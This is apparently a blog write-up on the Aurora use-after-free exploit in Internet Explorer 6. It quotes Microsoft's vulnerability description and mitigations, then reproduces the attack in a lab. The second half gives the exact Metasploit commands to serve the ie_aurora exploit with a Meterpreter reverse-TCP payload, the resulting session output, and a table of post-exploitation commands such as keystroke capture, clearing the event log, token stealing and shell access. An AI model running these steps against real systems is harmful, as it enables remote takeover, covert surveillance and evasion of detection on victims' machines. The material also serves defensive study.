Aurora Attack - Zero day exploit in IE6
Aurora attacks, which is known to be originated from china, is a major attack in the recent past which used an Internet explorer exploit code to attack companies like Google and Adobe and succeeded in stealing some intellectual properties.
According to Microsoft, The vulnerability exists as an invalid pointer reference within Internet Explorer. It is possible under certain conditions for the invalid pointer to be accessed after an object is deleted. In a specially-crafted attack, in attempting to access a freed object, Internet Explorer can be caused to allow remote code execution.
Vulnerability has been exploited on IE 6 till now and it can be exploited on IE 7 also, it’s not yet been done on IE 7 because of memory layout differences in IE 7.Exploit code has been published in the internet and can be used by anyone to craft similar attacks. Metasploit which is an open-source hacking tool has also released a working exploit of the attack which will be explained in detail in the last section.
Mitigation for this vulnerability according to the Microsoft is explained below:
- Data Execution Protection (DEP) is enabled by default in Internet Explorer 8 on the following Windows operating systems: Windows XP Service Pack 3, Windows Vista Service Pack 1, Windows Vista Service Pack 2, and Windows 7.
- Protected Mode in Internet Explorer on Windows Vista and later Windows operating systems limits the impact of the vulnerability.
- In a Web-based attack scenario, an attacker could host a Web site that contains a Web Page that is used to exploit this vulnerability. In addition, compromised Web sites and Web sites that accept or host user-provided content or advertisements could contain specially crafted content that could exploit this vulnerability. In all cases, however, an attacker would have no way to force users to visit these Web sites. Instead, an attacker would have to convince users to visit the Web site, typically by getting them to click a link in an e-mail message or Instant Messenger message that takes users to the attacker’s Web site.
- An attacker who successfully exploited this vulnerability could gain the same user rights as the local user. Users whose accounts are configured to have fewer user rights on the system could be less affected than users who operate with administrative user rights.
- By default, Internet Explorer on Windows Server 2003 and Windows Server 2008 runs in a restricted mode that is known as Enhanced Security Configuration. This mode sets the security level for the Internet zone to High. This is a mitigating factor for Web sites that you have not added to the Internet Explorer Trusted sites zone.
- By default, all supported versions of Microsoft Outlook, Microsoft Outlook Express, and Windows Mail open HTML e-mail messages in the restricted sites zone. The Restricted sites zone helps mitigate attacks that could try to exploit this vulnerability by preventing Active Scripting and ActiveX controls from being used when reading HTML e-mail messages. However, if a user clicks a link in an e-mail message, the user could still be vulnerable to exploitation of this vulnerability through the Web-based attack scenario.
Exploiting the Vulnerability:
We tried to reproduce the attack scenario using metasploit and were able to do it successfully. It was quite scary to see how the exploit works and how easy it is for a hacker to control the vulnerable system.
Software used for the attack and analysis:
- Metasploit Framework
- 2 networked VMware images running win XP with sp2.
- Tcpview
We were able to setup metasploit in one VMware image to run as server to control the hacked system by issuing following commands:
msf > use exploit/windows/browser/ie_auroramsf exploit(ie_aurora) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcpmsf exploit(ie_aurora) > set LHOST 192.168.1.30
LHOST => 192.168.1.30msf exploit(ie_aurora) > set LPORT 6666
LPORT => 6666msf exploit(ie_aurora) > set URIPATH /
URIPATH => /msf exploit(ie_aurora) > exploit
and this was the response which shows that the server was started
[*] Exploit running as background job.msf exploit(ie_aurora) >
[*] Started reverse handler on port 6666[*] Using URL: http://0.0.0.0:8080/
[*] Local IP: http://192.168.1.30:8080/[*] Server started.
We then opened Internet explorer in the vulnerable system(Other VMware running win XP with SP2) and entered the IP address(192.168.1.30 in our case) of the server in the browser and got the following response at the server end:
[*] Sending Microsoft Internet Explorer "Aurora" Memory Corruption to client 192.168.1.57[*] Sending stage (723456 bytes)
[*] Meterpreter session 1 opened (192.168.1.30:6666 -> 192.168.1.57:1038)
We then had to issue following command to start communicating with the exploited system:
sessions -i 1[*] Starting interaction with 1...
Examining the exploited system:
Checked the ports on the exploited system and found the backdoor which was opened by the exploit. Screenshot of the backdoor can be found below:
The port opened by the internet explorer can be seen in the fig 1.1 which will be used as backdoor in this scenario.
There are no other indications to find out that the computer has been hacked and can be controlled from a remote server.
Controlling the Exploited computer:
It’s really scary to see how a hacked computer can be controlled. An example of shell being controlled by the server can be seen below:
These are the following commands which can be used to control the hacked system including the command to take control of the shell.
Core Commands
=============
| Command | Description |
| ------- | ----------- |
| ? | Help menu |
| background | Backgrounds the current session |
| channel | Displays information about active channels |
| close | Closes a channel |
| exit | Terminate the meterpreter session |
| help | Help menu |
| interact | Interacts with a channel |
| irb | Drop into irb scripting mode |
| migrate | Migrate the server to another process |
| quit | Terminate the meterpreter session |
| read | Reads data from a channel |
| run | Executes a meterpreter script |
| use | Load a one or more meterpreter extensions |
| write | Writes data to a channel |
Stdapi: File system Commands
============================
| Command | Description |
| ------- | ----------- |
| cat | Read the contents of a file to the screen |
| cd | Change directory |
| del | Delete the specified file |
| download | Download a file or directory |
| edit | Edit a file |
| getlwd | Print local working directory |
| getwd | Print working directory |
| lcd | Change local working directory |
| lpwd | Print local working directory |
| ls | List files |
| mkdir | Make directory |
| pwd | Print working directory |
| rm | Delete the specified file |
| rmdir | Remove directory |
| upload | Upload a file or directory |
Stdapi: Networking Commands
===========================
| Command | Description |
| ------- | ----------- |
| ipconfig | Display interfaces |
| portfwd | Forward a local port to a remote service |
| route | View and modify the routing table |
Stdapi: System Commands
=======================
| Command | Description |
| ------- | ----------- |
| clearev | Clear the event log |
| drop_token | Relinquishes any active impersonation token. |
| execute | Execute a command |
| getpid | Get the current process identifier |
| getprivs | Get as many privileges as possible |
| getuid | Get the user that the server is running as |
| kill | Terminate a process |
| ps | List running processes |
| reboot | Reboots the remote computer |
| reg | Modify and interact with the remote registry |
| rev2self | Calls RevertToSelf() on the remote machine |
| shell | Drop into a system command shell |
| shutdown | Shuts down the remote computer |
| steal_token | Attempts to steal an impersonation token from the target process |
| sysinfo | Gets information about the remote system, such as OS |
Stdapi: User interface Commands
===============================
| Command | Description |
| ------- | ----------- |
| enumdesktops | List all accessible desktops and window stations |
| idletime | Returns the number of seconds the remote user has been idle |
| keyscan_dump | Dump they keystroke buffer |
| keyscan_start | Start capturing keystrokes |
| keyscan_stop | Stop capturing keystrokes |
| setdesktop | Move to a different workstation and desktop |
| uictl | Control some of the user interface components |
References
http://blog.metasploit.com/2010/01/reproducing-aurora-ie-exploit.html
http://www.microsoft.com/technet/security/advisory/979352.mspx